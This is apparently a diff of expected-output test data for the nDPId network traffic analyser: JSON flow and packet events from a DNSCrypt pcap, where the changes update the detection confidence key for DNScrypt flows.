01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":946739317432,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739317432,"pkt":"REREREREZmZmZmZmCABFAAIc15JAAL0RhZ0KAAABsDjtq79wAbsCCGC6smMBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjEIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAG+AAwBugAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":49008,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":49008,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":300,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":48325,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":946739317432,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739317432,"pkt":"REREREREZmZmZmZmCABFAAXc15EgAL0Rod4KAAABsDjtq7zFAbsGBG7RsmYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjEIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAW6AAwFtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":300,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":48325,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":300,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":48325,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection 
failed","datalink":1,"packet_id":301,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739317432} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":301,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739317432,"pkt":"REREREREZmZmZmZmCABFAABQ15EAub0RxrEKAAABsDjtqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":2,"flow_last_seen":946739317434,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":946739317434,"pkt":"ZmZmZmZmRERERERECABFAADXKh9AADQRgTsznqZhCgAAAQG7u8EAw9AjB2GBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAQt4OLzm4x3OBnTPVYOyWbwQ07ZuPzfh5UHeUSDpkuLilk8PnzqIG19XCvUsQGZmTzZ+d2RjpSDvvlP\/+37YoDPjwKVuBVGSevZiWx3QxU\/Ww92uJXMr1\/GUOUVCxbO0A+PApW4FUZJwAAAAFfU6w6X1T9ug=="} 
@@ -612,28 +612,28 @@ 00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":2,"flow_last_seen":946739317462,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":946739317462,"pkt":"ZmZmZmZmRERERERECABFAADcYmgAADoRvwiwOO2rCgAAAQG7j0QAyAhasmKBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjEIZG5zY3J5cHQCZXUAABAAAcAMABAAAQAAAAAAfXxETlNDAAIAABl3+ykQSZujAz2k88UgiWZ8EW8WsV\/cZTbX4vJmZY7W5pQMpzujkuwlfjXc+3bckBxwziAxuzLgEVuJhZegpADIiVqOfVhh6bINcwjX2cKXslxwpVLP3wwY1fcQglCKacmJWo59WGHpX1OncV9Tp3FfVPjx"} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":60091,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":946739317462,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739317462,"pkt":"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"} 
-00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":60091,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":60091,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52356,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":946739317462,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739317462,"pkt":"REREREREZmZmZmZmCABFAAXcwFwgAL0R2kAKAAABstjJ3syECAUGBG5EfSQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlzb2x0eXNpYWsDY29tAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":308,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52356,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":308,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52356,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":53117,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":946739317462,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739317462,"pkt":"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"} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":53117,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":53117,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":310,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739317462} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":310,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739317462,"pkt":"REREREREZmZmZmZmCABFAABQwFwAub0R\/xMKAAABstjJ3gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52221,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":946739317462,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739317462,"pkt":"REREREREZmZmZmZmCABFAAXcwF4gAL0R2j4KAAABstjJ3sv9CAUGBG7NfSIBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlzb2x0eXNpYWsDY29tAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
